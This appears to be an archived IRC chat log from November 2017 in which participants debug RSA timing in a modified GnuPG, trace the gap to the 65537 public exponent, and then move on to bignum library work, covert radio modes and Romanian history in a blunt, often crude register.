attempt at crypto communication. there was nothing to say all along. 1731933;1509645722;BingoBoingo;diana_coman: Immigrant snakes in Florida will die swallowing alligators, but haven't seen anything about crocs 1731934;1509645726;mircea_popescu;we're ~the first group with something to actually say. 1731935;1509645746;mircea_popescu;diana_coman crocodile is too fast for snake. 1731936;1509645763;mircea_popescu;i know it doesn't look it, but, crocodile is one of the fastest predators ; apex predator everywhere it exists. 1731937;1509645764;diana_coman;BingoBoingo, interesting; do alligators survive that though? 1731938;1509645790;shinohai;In other "Encryption is for terrorists" news: http://archive.is/zx5WL 1731939;1509645792;mircea_popescu;whereas the only sort of snake that'd bother it even conceivably is constrictor ; definitionally slow. 1731940;1509645793;BingoBoingo;diana_coman: I don't recall. 1731941;1509645794;diana_coman;mircea_popescu,I know it to be uber-fast in water; dunno on land; either way, never saw one in its habitat 1731942;1509645803;mircea_popescu;they lurch see. 1731943;1509645808;asciilifeform;diana_coman: didja actually verify the decryptions' equality to the original input to encrypt ? 1731944;1509645816;diana_coman;yes but after recording the time 1731945;1509645829;diana_coman;I even have those in a file too (i.e. each run, data, encrypted, decrypted 1731946;1509645840;asciilifeform;because i see a public_rsa(out1, msg, &pkey) but then a secret_rsa( out2, out1, skey ) 1731947;1509645844;diana_coman;honestly, it's prolly faster to go through it again and then post it all and then take it from there 1731948;1509645863;diana_coman;yes, msg is original data; out1 is encrypted; out2 is decrypted 1731949;1509645865;mircea_popescu;now on the other hand, BABY crocodiles are universally fodder, birds eat them, fish eat them. huge infant mortality among crocs. 1731950;1509645866;asciilifeform;whereas declared as void public_rsa(MPI output, MPI input, RSA_public_key *pkey ) and void secret_rsa(MPI output, MPI input, RSA_secret_key *skey ) 1731951;1509645875;asciilifeform;i.e. both take ptr 1731952;1509645899;diana_coman;ah, yes, that's just because the public key is a local var filled with the stuff from private 1731953;1509645907;diana_coman;the private thing basically holds anything anyway 1731954;1509645909;asciilifeform;hm ok 1731955;1509645930;diana_coman;lemme just cut the fluff and then will post 1731956;1509645940;asciilifeform;what's clock() 1731957;1509645956;diana_coman;c function from time.h 1731958;1509645964;diana_coman;cpu clock ticks supposedly 1731959;1509645965;asciilifeform;uhoh 1731960;1509645991;diana_coman;from the post: Durations are given as CPU time in seconds, as reported by the clock() function (time.h) and calculated as ( (double) (end – start) ) / CLOCKS_PER_SEC where end is the value returned by clock() right before starting the RSA operation and end() is the value returned by clock() right after returning from the RSA operation 1731961;1509646000;asciilifeform;yes well 1731962;1509646039;asciilifeform;on some boxes the output for short intervals is essentially random 1731963;1509646055;diana_coman;uhm; what do you suggest I use? 1731964;1509646114;asciilifeform;http://man7.org/linux/man-pages/man2/clock_gettime.2.html theoretically 1731965;1509646125;asciilifeform;but i still have the feeling that this is red herring 1731966;1509646283;diana_coman;hm, I'd be surprised if it gets wildly different results but that would be in itself something...interesting I guess 1731967;1509646382;asciilifeform;diana_coman: is out1 perchance ever equal to out2 ? 1731968;1509646386;asciilifeform;( same buffer ) 1731969;1509646408;mod6;do you have metrics from a baseline of an unaltered gpgtron? 1731970;1509646419;mod6;could then compare your results to that and see. 1731971;1509646430;diana_coman;mod6, I couldn't find some that are directly comparable aka only the rsa ops as such 1731972;1509646443;asciilifeform;mod6: what diana_coman has is as close as fathomable to a virginal gpg where you can still make such a test 1731973;1509646465;diana_coman;asciilifeform, they are not; moreover the log shows clearly that encrypted stuff is different basically 1731974;1509646474;diana_coman;encrypted being out1 1731975;1509646492;asciilifeform;diana_coman: aite. you will notice that public_rsa mallocs if it finds that the output buffer is same as input 1731976;1509646509;diana_coman;yes, I know 1731977;1509646568;danielpbarron;!~later tell BingoBoingo http://wotpaste.cascadianhacker.com/pastes/JDAx6/?raw=true 1731978;1509646569;jhvh1;danielpbarron: The operation succeeded. 1731979;1509646585;asciilifeform;diana_coman: quite a puzzler then: all of the most obvious mistakes, ruled out 1731980;1509646908;asciilifeform;diana_coman: to rule out timer artifacts, can make item that, e.g., carries out 1,000 decrypts, timed with ordinary unix time cmd; then same where 1,000 encrypts 1731981;1509646927;asciilifeform;this is relatively insensitive to clock precision 1731982;1509646945;diana_coman;asciilifeform, possibly I managed to screw it up in an even more basic way; here's the test function itself (this one gets called repeatedly for each key and each message) 1731983;1509646948;diana_coman;http://wotpaste.cascadianhacker.com/pastes/AaM6D/?raw=true 1731984;1509646996;asciilifeform;uh 1731985;1509647004;asciilifeform; pkey.n = skey->n; 1731986;1509647004;asciilifeform; pkey.e = skey->e; 1731987;1509647025;asciilifeform;i am more than a little bit surprised that this didn't bomb 1731988;1509647046;diana_coman;hm, I looked at it and it did not; but let's check 1731989;1509647049;diana_coman;with a proper copy 1731990;1509647116;asciilifeform;and msg is always zero ?! 1731991;1509647124;asciilifeform;or hm nm 1731992;1509647155;diana_coman;no, it's not 1731993;1509647195;asciilifeform;aha i see it 1731994;1509647225;asciilifeform;i see no obvious explanation for the oddity... 1731995;1509647272;mircea_popescu;http://btcbase.org/log/2017-11-01#1731745 << ok, but don't count republican accounting in fiatola ; yes you have an underprotection clause, but it's an ancillary, beloings in a footnote. 1731996;1509647272;a111;Logged on 2017-11-01 17:54 BingoBoingo: Rewrite in works http://btcbase.org/log/2017-11-01#1731666 << No good reason. http://btcbase.org/log/2017-11-01#1731667 << No, attempting to list the advance as a debt by recreating necessary TMSR accounting out of log fragments http://btcbase.org/log/2017-11-01#1731682 << Will try not juggling network topology in forebrain when rewriting http://btcbase.org/log/2017-11-01#1731687 << There will be rug 1731997;1509647292;mircea_popescu;don't worry about it, trial and error, i'll ask questions until i'm out. 1731998;1509647299;mircea_popescu;you keep redoing lol 1731999;1509647335;diana_coman;so, changed those 2 lines to pkey.n = mpi_copy(skey->n) and pkey.e = mpi_copy(skey->e) ; correct? 1732000;1509647349;BingoBoingo;danielpbarron: ty I'll get to your message when physical plant allows 1732001;1509647376;BingoBoingo;mircea_popescu: Ah, ty. 1732002;1509647386;diana_coman;so far results similar in any case aka using public still 0.01... while private afterwards 1.0... 1732003;1509647399;asciilifeform;brainmelting 1732004;1509647405;asciilifeform;prolly time for gprof. 1732005;1509647414;mircea_popescu;did you two run into a fucking portability issue of all things ? 1732006;1509647414;BingoBoingo;brb, mains! 1732007;1509647421;asciilifeform;mircea_popescu: nobody yet knows. 1732008;1509647439;diana_coman;mircea_popescu, so far the ~only part iffy is perhaps choice of timer basically 1732009;1509647459;mircea_popescu;diana_coman do you have something idiotic like say ntp correcting your clock mid-stride maybe ? 1732010;1509647464;*;mircea_popescu strawpulling 1732011;1509647465;diana_coman;but in a few hours I'll have more uninterrupted time on my hands and I'll be able to go a bit deeper into it 1732012;1509647538;asciilifeform;!!up apeloyee 1732013;1509647539;deedbot;apeloyee voiced for 30 minutes. 1732014;1509647568;apeloyee;asciilifeform: don't be silly, the discrepancy is due to using low public exponent 1732015;1509647594;asciilifeform;apeloyee: why would this make crt a 100x ~slower~ op , instead of 4x faster 1732016;1509647594;mircea_popescu;holy... 1732017;1509647635;mircea_popescu;!!rated apeloyee 1732018;1509647636;deedbot;mircea_popescu rated apeloyee 1 at 2017/09/20 22:18:33 << Makes alf re-read. 1732019;1509647649;asciilifeform;we weren't comparing gpgmpi to ffa ; but gpg.publicmodexp vs gpg.privatemodexp 1732020;1509647657;apeloyee;it's _encryption_ that's unreasonably fast, due to using 65537 as exponent 1732021;1509647661;mircea_popescu;!!rate apeloyee 2 might be the smartest guy here, actually. 1732022;1509647663;deedbot;Get your OTP: http://p.bvulpes.com/pastes/jsJRp/?raw=true 1732023;1509647717;apeloyee;decryption is forced to do full-size exponentiation 1732024;1509647724;asciilifeform;defo apeloyee has better reading comprehension. i entirely missed the line where diana_coman clearly wrote, she used 65537 1732025;1509647726;asciilifeform;so yes 1732026;1509647763;mircea_popescu;i r impressed, also missed.\ 1732027;1509647773;asciilifeform;i nominate this d00d to replace me when i'm killed. 1732028;1509647778;mircea_popescu;whole fucking point of intelligence is not to miss. 1732029;1509647847;asciilifeform;of a good sapper at any rate. 1732030;1509647867;mircea_popescu;on a side note, if you ever wondered whence the "transhumanist" etc-rationalistrs come from, check out this little gem teh loney uncovered in my absence : http://trilema.com/2010/calea-spre-idiotenie/#comment-123389 1732031;1509647897;asciilifeform;dafuq is ikigai 1732032;1509647916;mircea_popescu;http://btcbase.org/log/2017-11-01#1731778 << cable comms work well in some situations, with spools and runners as deployed in ww2. yes cable can be cut -- by the time it is you're gone anyway. 1732033;1509647916;a111;Logged on 2017-11-01 18:18 asciilifeform: they are imho an intrinsically usgistic item -- costly, fragile, vulnerable, conspicuous. 1732034;1509647928;diana_coman;oh my; thank you apeloyee 1732035;1509647953;mircea_popescu;asciilifeform dafuq is anything else. what, you understand "transhumanism" but not "dfhgkerjhtkr" ? 1732036;1509647956;mircea_popescu;they're words they use. 1732037;1509647971;asciilifeform;diana_coman: i wrongly assumed you had fuckgoats output for exponent just same as for key 1732038;1509647985;asciilifeform;because this was in the tentative 'standard' as a variant 1732039;1509647997;asciilifeform;and entirely missed the line in the orig article stating that this was not so... 1732040;1509648024;asciilifeform;mircea_popescu: it's spamology tho, not broken modem, generally there's some consistency neh 1732041;1509648035;mircea_popescu;the rationale is that there ~might~ be some approaches based on pre-established exponents. this is vague, but still, why magic number. 1732042;1509648069;mircea_popescu;asciilifeform i have not yet managed to find the 1 ton of earthworms required to put through the blenders so as to extract the definition of any of these nuts' terms. 1732043;1509648079;asciilifeform;mircea_popescu: cables also work well in another context: cuckolding. if you know what yer doing you can ride signal on top of , e.g., cable tv lines, or whatever derperies of the landscape 1732044;1509648093;mircea_popescu;the advantage of small batshit cults is that there's not enough of them to discover where they self-contradict. 1732045;1509648129;asciilifeform;mircea_popescu: in ffa world, you don't lose anything by using a W-bit prime for the public exponent. 1732046;1509648132;mircea_popescu;(kinda why historically these were "secrets", from eleusis to scientology. the less material, the easier the complexity load) 1732047;1509648165;mircea_popescu;asciilifeform no, i know. from the pov of rsa-being-attacked, it's probably better to have non-standard exponent than "everyone uses 65537" 1732048;1509648173;asciilifeform;aha, and the wider, the better. 1732049;1509648182;mircea_popescu;but this is nothing i can prove in any degree of particuliar. 1732050;1509648194;asciilifeform;the only thing you can prove is that it dun cost you nuffin. 1732051;1509648200;mircea_popescu;this, yes. 1732052;1509648201;asciilifeform;( other than the basic cost of using ffa ) 1732053;1509648203;diana_coman;asciilifeform, guess my next run will have to be with an fg-generated exponent as well; it's not a big deal to add that now; but this was very first run of the very minimal thing 1732054;1509648220;asciilifeform;diana_coman: i expect that you will find the expected 4:1 result then. 1732055;1509648222;mircea_popescu;yee. 1732056;1509648224;asciilifeform;it will be very interesting if not. 1732057;1509648227;diana_coman; asciilifeform no, i know. from the pov of rsa-being-attacked, it's probably better to have non-standard exponent than "everyone uses 65537" <- this 1732058;1509648262;mircea_popescu;also it will have the interesting side effect of exposinbg the shit quality of the imperial hardware/software stacks whenever they try to use our keypairs. 1732059;1509648268;asciilifeform;diana_coman: the folx with custom rsa-bruting silicon , i expect are pissing themselves as we speak 1732060;1509648283;mircea_popescu;i expect a full half of extant rsatrons simply crash if exponent 1kbit 1732061;1509648305;asciilifeform;mircea_popescu: at the very least they will sit around mallocing for a good spell 1732062;1509648307;apeloyee;fwiw, I understand "transhumanist" as "fantasising about entities which are non-human except in the ways dear to me (which in practice will mean they're either impossible or are just broken humans)" work? 1732063;1509648326;mircea_popescu;apeloyee but does this heuristic pass your own criteria for what a definition is ? 1732064;1509648343;asciilifeform;apeloyee: as i understand it was originally 'what if we had memory implants' etc. 1732065;1509648347;mircea_popescu;i also have a vague sense of which categories of psychogenic noise are involved, but... 1732066;1509648375;asciilifeform;bastard child of 'intelligence amplification' as imagined in 1970s, when 'computer won't suck' was still possible to easily contemplate 1732067;1509648394;mircea_popescu;a perfectly valid alt-approach would be to say "transhumanist" is how the new generation of idiots (that call themselves socialists) call "the new man". 1732068;1509648398;mircea_popescu;lenin, also "transhumanist" 1732069;1509648405;apeloyee;not really, but then fantasies don't need rigorous definition 1732070;1509648419;mircea_popescu;actually, fantasies are rigorously defined, yes. 1732071;1509648436;mircea_popescu;there's such a thing as a classification of insanity loci. 1732072;1509648445;asciilifeform;fantasies of stupid folx tend to resolve to some simple combo of physiological hungers being satisfied 1732073;1509648459;asciilifeform;( iirc mircea_popescu had a piece re subj ) 1732074;1509648541;asciilifeform;apeloyee: upstack, it becomes clear that koch put in crt strictly so that gpg can shit out your private key when uncorrected memory flip 1732075;1509648574;asciilifeform;because that's the only thing it accomplishes here 1732076;1509648597;apeloyee;but you ripped asm, which gpg would usually use, no? 1732077;1509648601;apeloyee;*ripped out 1732078;1509648615;asciilifeform;i did. however this affects both priv and pub op equally 1732079;1509648731;apeloyee;would need to check the no-crt version 1732080;1509648755;asciilifeform;pretty easy to do, flip the 0 to 1 in the quoted snippet. 1732081;1509648774;asciilifeform;( incidentally there will be no crtism in ffa . ) 1732082;1509648815;asciilifeform;though i suppose if someone wants to write pcode for a crtistic rsa, i cannot stop him 1732083;1509648974;apeloyee;because that's the only thing it accomplishes here << how did you come to this conclusion 1732084;1509649092;apeloyee;incidentally, how about http://btcbase.org/log/2017-01-11#1601593 ? 1732085;1509649092;a111;Logged on 2017-01-11 19:10 asciilifeform: incidentally if this were me, i'd make a voyage-only wot key, rate it +1, then at the end, when getting back to home, sign statement 'my voyage key was uneventfully used N times and then incinerated' or 'pygmies stole my voyage key K and signed audacious forgeries F1, F2...' depending on how it went. 1732086;1509649093;asciilifeform;i suppose can disagree if diff b/w 4 and 1 sec matters, lol 1732087;1509649126;asciilifeform;apeloyee: i actually did this the other day. it was publicly used 0 times. 1732088;1509649146;asciilifeform;( http://btcbase.org/log/2017-11-01#1731744 ) 1732089;1509649146;a111;Logged on 2017-11-01 17:20 deedbot: asciilifeform unrated ascii_in_orcland. 1732090;1509649183;asciilifeform;( well, technically 1 time, but prior to voyage. ) 1732091;1509649257;apeloyee;how's 'p' going? still 'need GCD!!!11one'? 1732092;1509649289;asciilifeform;apeloyee: i used your barrettism 1732093;1509649314;asciilifeform;( iirc posted 2wk or so ago ) 1732094;1509649347;asciilifeform;still gotta finish the , yes, gcd, then miller-rabin, then autotests, then that's it 1732095;1509649349;asciilifeform;!!up apeloyee 1732096;1509649350;deedbot;apeloyee voiced for 30 minutes. 1732097;1509649403;asciilifeform;asciilifeform did not touch ffa/p at all other than on airplane, in past wk 1732098;1509649424;apeloyee;you wanted modexp in <1s, do you consider current 2s OK? 1732099;1509649474;asciilifeform;apeloyee: it's <1s already on just about any comp the readers are likely to have. 2s on my 2009 opteron. 1732100;1509649525;asciilifeform;i'ma also try unrolled comba, to compare, but do not want to spend eons on this type of massage, it can happen after release of p. 1732101;1509649540;asciilifeform;( i already have, and posted, an unrolled comba -- see august log. ) 1732102;1509649556;asciilifeform;it was approx 30% faster on mult per se. 1732103;1509649603;apeloyee;what gcd did you choose? 1732104;1509649640;asciilifeform;currently puzzling over the one apeloyee posted 1732105;1509649666;apeloyee;problems? 1732106;1509649768;asciilifeform;problems closing the 'and here we omit' holes 1732107;1509649781;asciilifeform;apeloyee: if you have an updated ver repaste plox. 1732108;1509649797;apeloyee;no, don't have, sorry. 1732109;1509649801;asciilifeform;aite. 1732110;1509649948;asciilifeform;apeloyee: don't hesitate to write in if you find one. 1732111;1509649955;asciilifeform;this goes for the other eagle eyes likewise. 1732112;1509649998;asciilifeform;i promise to actually read instead of allergically barfing. 1732113;1509650355;apeloyee;asciilifeform: problem is I have nfi what's non-obvious to you. I thought most things i posted was obvious, but apparently not 1732114;1509650401;asciilifeform;nonobvious i found the aspect where it's supposed to be faster than naive gcd 1732115;1509650443;asciilifeform;(that is, naive gcd with muxed output rather than the ordinary conditional termination) 1732116;1509650467;apeloyee;the division in ffa is slow 1732117;1509650472;apeloyee;that's why 1732118;1509650579;asciilifeform;btw iirc at one time apeloyee posted a newtonian divider, using secretbitcount and secretshift, but the paste got gc'd and it seems i dun have a copy... 1732119;1509650626;*;asciilifeform prolly oughta set up a perlism to fetch all pastes and save locally, because this is getting ridiculous 1732120;1509650631;apeloyee;it was only an idea for the same, not actual description 1732121;1509650637;asciilifeform;idea is ok. 1732122;1509650723;asciilifeform;i suspect that 'naive' gcd with newtonian divider will be goodenuff speedwise. 1732123;1509650770;apeloyee;my copies of stuff I pasted only has a header entitled "1. Reciprocal calculation by Newton's method", but no content 1732124;1509650779;asciilifeform;ugh 1732125;1509650796;asciilifeform;fortunately mr newton wrote it down... 1732126;1509651146;asciilifeform;in other impressive-if-true tech, http://hflink.com/olivia >> 'Olivia is one of the most robust methods of text keyboarding, that can perform superbly for long distance communications in ionospheric noise conditions where other modes fail. It is possible to communicate worldwide using Olivia with as little as a few watts of transmitter power... Olivia is different from some other types of amateur radio digital keyboarding methods, be 1732127;1509651146;asciilifeform;cause it can often be decoded perfectly in the most poor signal-to-noise conditions, even when the human ear cannot discern the presence of the signal, and even when it cannot be easily seen on the conventional waterfall spectrum display' 1732128;1509651236;asciilifeform;^ per asciilifeform's current understanding, thing is untriangulable unless enemy knows the freq keying pattern, or is standing in the near field of your transmitter. 1732129;1509651371;ben_vulpes;ho ho 1732130;1509651379;apeloyee;and as usual, "to use it, download this here windows turd". 1732131;1509651401;ben_vulpes;how does it work? 1732132;1509651407;asciilifeform;apeloyee: i dun think anyone here would seriously consider using the turd 1732133;1509651417;apeloyee;how does it work? <> 404 1732135;1509651431;asciilifeform;reversing wtf it does, is on asciilifeform's conveyor. 1732136;1509651444;apeloyee;how about designing your own 1732137;1509651454;asciilifeform;apeloyee: i found the thing in the course of designing own. 1732138;1509651457;asciilifeform;multi-year thing. 1732139;1509651477;asciilifeform;every once in a while i find the dessicated corpses of folx who were doing evidently ~same thing i was. 1732140;1509651524;apeloyee;one reason those seem impressive is that classical analog modes are so inefficient. 1732141;1509651531;asciilifeform;indeed 1732142;1509651553;apeloyee;\read condition of shannon's noisy channel coding theorem, compare with what clssic modes do, and weep. 1732143;1509651653;asciilifeform;ideally what one'd like is item that is not physically distinguishable from thermal noise to anyone without the key. 1732144;1509651693;apeloyee;needs more wide spectrum 1732145;1509651701;apeloyee;that that olivia thing 1732146;1509651720;asciilifeform;can't be too wide or you get propagation (and multipath) problems 1732147;1509651808;asciilifeform;most of spectrum is not esp. desirable real estate if you want 1000s of km through air 1732148;1509651834;apeloyee;you will have to deal with multipath . narrow spectrum modes is just pretending problem doesn't exist, they just stop working on destructive interference 1732149;1509651882;asciilifeform;can deal with it same as with everything else, by lubycode-cum-rsa (i.e. distiller of signal from noise , followed by authenticator ) 1732150;1509651939;apeloyee;if you accept ~ minute latency, perharps. 1732151;1509651944;asciilifeform;days is ok. 1732152;1509651946;asciilifeform;the q remains of how one might hide a 100kW transmission from hitler. 1 possible method is to mimic the noise of a natural phenomenon, like lightning strike. 1732153;1509651967;asciilifeform;another is to mimic a common source of crapola, e.g. defective electric motors. 1732154;1509651984;mircea_popescu;http://btcbase.org/log/2017-11-01#1731781 << you'll note that it's unclear whether the millions us spent to tap produced a net profit for the us or su side. 1732155;1509651984;a111;Logged on 2017-11-01 18:31 asciilifeform: didn't save su cable in sea of japan from 'ivy bells' . 1732156;1509651989;mircea_popescu;in any case the untapping cost what, 50k ? 1732157;1509652028;asciilifeform;mircea_popescu: it is difficult to reason about 'was doing x to su +ev' -- sorta like you shoot a man, but he dies of fright first, and then ask whether bullet was wasted 1732158;1509652030;apeloyee;the third is to spread it over several tens of MHz. 1732159;1509652053;mircea_popescu;part of the reason the us believed su is nuclear-capable though. 1732160;1509652159;asciilifeform;apeloyee: it is not clear to me that 'tens' suffices 1732161;1509652164;asciilifeform;for 'below noise floor' 1732162;1509652191;mircea_popescu;http://btcbase.org/log/2017-11-01#1731785 << no but the 2012 statement doesn't count because it was you know "unfairly" too soon. only the 2017 restatement counts, because CORRECT COLOR OF BITS!11 1732163;1509652191;a111;Logged on 2017-11-01 18:34 asciilifeform: meanwhile, in the world of 'totally not stolen from #t', https://archive.is/UuRQt 1732164;1509652196;mircea_popescu;and other imperial halucinaria. 1732165;1509652201;asciilifeform;at any rate drawing a plot like http://www.oliviamode.com/OliviaView.htm should not be possible for proper item. 1732166;1509652239;mircea_popescu;but, for they interested in ancient history, the phillip g potter dood was there at c1, trying to sell his stuff. it didn't take. 1732167;1509652242;asciilifeform;mircea_popescu: there's lately a bacchanalia of 'totally not phuctor'ism, i only linked a few representative turds 1732168;1509652254;asciilifeform;waitasec whossat 1732169;1509652262;mircea_popescu;named in the linked item. 1732170;1509652265;mircea_popescu;"consultant" or w/e. 1732171;1509652266;asciilifeform;aaa 1732172;1509652274;asciilifeform;aaaaaaa 1732173;1509652298;asciilifeform;asciilifeform eggoged internally, thought $link was to the primes thing on same day. 1732174;1509652325;mircea_popescu;http://btcbase.org/log/2017-11-01#1731792 << hey, this is exactly how we got "out democracy". all dem experts with human rights, by virtue of turds that sat themselves right next to genuine article. 1732175;1509652325;a111;Logged on 2017-11-01 19:11 asciilifeform: and to shelve them right next to actuals. 1732176;1509652345;*;asciilifeform still palpably brainfucked after $expedition 1732177;1509652396;mircea_popescu;http://btcbase.org/log/2017-11-01#1731800 << o.O that was a long ti,e 1732178;1509652396;a111;Logged on 2017-11-01 19:46 doppler: haha, the last list item is great 1732179;1509652398;mircea_popescu;time* 1732180;1509652418;asciilifeform;mircea_popescu: i find it worth noting that doppler reappeared immediately after asciilifeform unrated for inactivity 1732181;1509652418;mircea_popescu;http://btcbase.org/log/2017-11-01#1731804 << it always had a front as sewing machine producer etc. 1732182;1509652418;a111;Logged on 2017-11-01 20:19 asciilifeform: http://www.umcugir.ro/Buget-Bilanturi%20contabile.html << public statements, interestingly. 1732183;1509652433;asciilifeform;mircea_popescu: 'i keep bringing home parts but always get maxim!!' (tm)(r) 1732184;1509652438;mircea_popescu;quite 1732185;1509652483;mircea_popescu;http://btcbase.org/log/2017-11-01#1731805 << romania sold arms independently in the 90s. extremely profitable. then "joined nato", extremely not profitable anymore, but hey, "we're all part of a greater thing" and other consolations.\ 1732186;1509652483;a111;Logged on 2017-11-01 20:19 asciilifeform: went, apparently, into the black, when absorbed into the reich machine. 1732187;1509652510;asciilifeform;they mega-sold, even to hobbyists in usa 1732188;1509652514;asciilifeform;but nomoar. 1732189;1509652546;mircea_popescu;http://btcbase.org/log/2017-11-01#1731801 << ahaha an exception amirite ? "effective counsel is sufficient cause to remove attorney-client priviledge!111" 1732190;1509652546;a111;Logged on 2017-11-01 19:47 BingoBoingo: And in other SOPs Sopping slop: "Chief Judge Beryl A. Howell of the U.S. District Court for the District of Columbia had agreed to allow Robert Mueller to use something called the crime-fraud exception to attorney-client privilege to compel testimony from an attorney who formerly represented Paul Manafort and Manafort’s onetime employee Rick Gates." 1732191;1509652554;asciilifeform;( ro kalash was eeeverywhere for a while in early 2010s ) 1732192;1509652556;mircea_popescu;tell you what : criminal lawyer either uses rsa or isn't. 1732193;1509652592;mircea_popescu;asciilifeform aha. part and parcel of the great benefits romania derived from it's great loving western neighbour stealing all its shit. 1732194;1509652611;asciilifeform;ymean eastern 1732195;1509652628;asciilifeform;( at least on my globe... ) 1732196;1509652655;mircea_popescu;us is western to romania. 1732197;1509652663;asciilifeform;hm i thought was re su 1732198;1509652667;asciilifeform;and the yellowcake. 1732199;1509652680;mircea_popescu;well, in the 50s su stole romania's u-quartz, grain, train cars etc. 1732200;1509652688;asciilifeform;what did us steal? it can't have been the gurlz, they were still there on sunday 1732201;1509652690;asciilifeform;ah hm. 1732202;1509652693;mircea_popescu;in the 00s us stole romania's nuclear tech, fine mechanics plants, etc. 1732203;1509652703;mircea_popescu;differences entirely absent. 1732204;1509652711;asciilifeform;i went into campus of 'umt' in timis, it was fascinating 1732205;1509652731;asciilifeform;massive townlet of abandoned pripyat-style megafactory, with a little modern thing in the middle making bmw transmissions 1732206;1509652738;mircea_popescu;http://btcbase.org/log/2017-11-01#1731816 <<< it's deliberately "simple english" "patriotism" stuff. 1732207;1509652738;a111;Logged on 2017-11-01 20:46 asciilifeform: i'll let the actual ro-boriginals settle this one, lol 1732208;1509652753;mircea_popescu;history-less item, basicalyl a sort of advertisment. 1732209;1509652768;mircea_popescu;petrocheese, in a word. 1732210;1509652778;asciilifeform;hence http://btcbase.org/log/2017-11-01#1731808 1732211;1509652778;a111;Logged on 2017-11-01 20:31 asciilifeform: ^ approx. a ro-flavoured 'широка страна моя родная'. 1732212;1509652797;asciilifeform;it stuck to asciilifeform's head precisely because screaming sovokism 1732213;1509652798;mircea_popescu;well, no, inasmuch as that was made by and for the local soviets. 1732214;1509652807;apeloyee;fwiw pediwikia claims that Olivia is designed to resist multipath: https://en.wikipedia.org/wiki/Olivia_MFSK#History 1732215;1509652818;mircea_popescu;this is more like "usg pr experts reusing superficial arrangements of ro folklore" 1732216;1509652828;asciilifeform;apeloyee: i'm not so fixated on 'olivia' per se, but the principle. 1732217;1509652855;asciilifeform;mircea_popescu: hey, at least it beats bush's 'and i luvv to live in amerikka, where at least iknow i'm phreee!111' 1732218;1509652864;mircea_popescu;http://btcbase.org/log/2017-11-01#1731822 << nb. i vaguely recall discussing the old ro instruments at some point. 1732219;1509652864;a111;Logged on 2017-11-01 21:00 davout: gets actually started after a minute or so 1732220;1509652869;asciilifeform;( i fughet the title, it was pestilential ) 1732221;1509652882;mircea_popescu;asciilifeform they do know they're free, so... 1732222;1509653063;mircea_popescu;diana_coman is m-r upper-bounded by 1/4 ^ 12 ? or lower ? 1732223;1509653298;asciilifeform;in other ancient rf lulz, nazis had 'hellschreiber', a kind of skytale for spectrum 1732224;1509653315;asciilifeform;( skitale ? ) 1732225;1509653332;mircea_popescu;the spartan item ? 1732226;1509653335;asciilifeform;http://btcbase.org/log/2017-08-09#1695948 aha it 1732227;1509653335;a111;Logged on 2017-08-09 17:59 mircea_popescu: basically they had this early elliptic curve crypto, implemented as an arbitrary cone on which they wrapped a string. because the string is fixed length see, whereas the section of cone is not. 1732228;1509653363;mircea_popescu;fun fact : most actual applciations were lazy, used plain stick. 1732229;1509653374;asciilifeform;https://www.nonstopsystems.com/radio/hellschreiber-function-operation.htm << subj 1732230;1509653381;asciilifeform;mircea_popescu: aha equiv to today's dud keys lol 1732231;1509653414;mircea_popescu;(cylinder scytale trivially broken using two rigid sticks -- alter distance) 1732232;1509653424;asciilifeform;noshit.jpg 1732233;1509653441;mircea_popescu;justsayin'. "convenience", 500 bc, 2000 ad. 1732234;1509653531;apeloyee;i find it worth noting that doppler reappeared immediately after asciilifeform unrated for inactivity << perharps notification in IRC client on mention 1732235;1509653541;asciilifeform;possib 1732236;1509653541;diana_coman;mircea_popescu, huh, not that clear in my text, is it; will update; specifically: with 12 iterations probability that M-R falsely returns prime on a non-prime is less than (1/4)^12 1732237;1509653545;apeloyee;!#s "fuck you Anduck" 1732238;1509653546;a111;1 result for "\"fuck you Anduck\"", http://btcbase.org/log-search?q=%22fuck%20you%20Anduck%22 1732239;1509653565;mircea_popescu;diana_coman right. 1732240;1509653572;asciilifeform;incidentally the spreadspectrumtron popularly attributed to h. lamar ( the hot chix ) was skitale principle but turning ~freq~ knob 1732241;1509653574;asciilifeform;mechanically. 1732242;1509653692;mircea_popescu;http://btcbase.org/log/2017-11-02#1731835 << it's literally in ben_vulpes 's paste homepage! 1732243;1509653692;a111;Logged on 2017-11-02 02:31 lobbes: while probably elementary to most here, I just discovered that I can send POST requests with curl. One single line! The simple joys of n00bdom. 1732244;1509653759;mircea_popescu;http://btcbase.org/log/2017-11-02#1731843 << yup, it's the correct approach. 1732245;1509653759;a111;Logged on 2017-11-02 02:41 trinque: archiver process breaks, can fix, restart, keep munching on work queue 1732246;1509653882;mircea_popescu;http://btcbase.org/log/2017-11-02#1731848 << a word to the wise, don't bake exceptions in. 1732247;1509653882;a111;Logged on 2017-11-02 02:46 lobbes: anyways, for the wotpastes specifically, I plan to download and store those myself from the get-go (and NOT route them through archive.is), seeing as those are easily 'flagged' due to the predictable url. To alf's point, even if archive.is stays up, diddling is always a threat. Any bits I can do without it now is +ev imo 1732248;1509653887;mircea_popescu;you'll come to regret them. 1732249;1509654057;mircea_popescu;!~ticker --market all 1732250;1509654063;jhvh1;mircea_popescu: Bitstamp BTCUSD last: 7071.99, vol: 27186.03264905 | Bitfinex BTCUSD last: 7082.2, vol: 99361.03874681 | Kraken BTCUSD last: 7070.0, vol: 7465.52633086 | Volume-weighted last average: 7079.44914806 1732251;1509654067;mircea_popescu;o wow srsly ? 1732252;1509654071;mircea_popescu;i should travel more often. 1732253;1509654142;asciilifeform;notbad, castle-mircea_popescustein in timis costs not so much moar than what asciilifeform lost on bbet, lol 1732254;1509654171;asciilifeform;( and the infamous kakotoyota could buy the whole orchestra ) 1732255;1509654222;mircea_popescu;meanwhile in chef's salads, http://78.media.tumblr.com/c80197dcb9e37197b9010a2be8aaf1e8/tumblr_nmc3qnovSz1stzc8to1_1280.jpg 1732256;1509654569;mircea_popescu;http://btcbase.org/log/2017-11-02#1732128 << moar phase locked goodies eh 1732257;1509654569;a111;Logged on 2017-11-02 19:33 asciilifeform: ^ per asciilifeform's current understanding, thing is untriangulable unless enemy knows the freq keying pattern, or is standing in the near field of your transmitter. 1732258;1509654592;asciilifeform;loosely speaking yes. 1732259;1509654634;mircea_popescu;http://btcbase.org/log/2017-11-02#1732148 << check it out, he understands radio too. 1732260;1509654634;a111;Logged on 2017-11-02 19:43 apeloyee: you will have to deal with multipath . narrow spectrum modes is just pretending problem doesn't exist, they just stop working on destructive interference 1732261;1509654644;asciilifeform;iirc physics d00d. 1732262;1509654650;mircea_popescu;i thought maffs. 1732263;1509654676;asciilifeform;logs in , at any rate, from chernogolovka, the su mega-mecca 1732264;1509654695;mircea_popescu;http://btcbase.org/log/2017-11-02#1732153 << ideal is to not use the mw for anything. 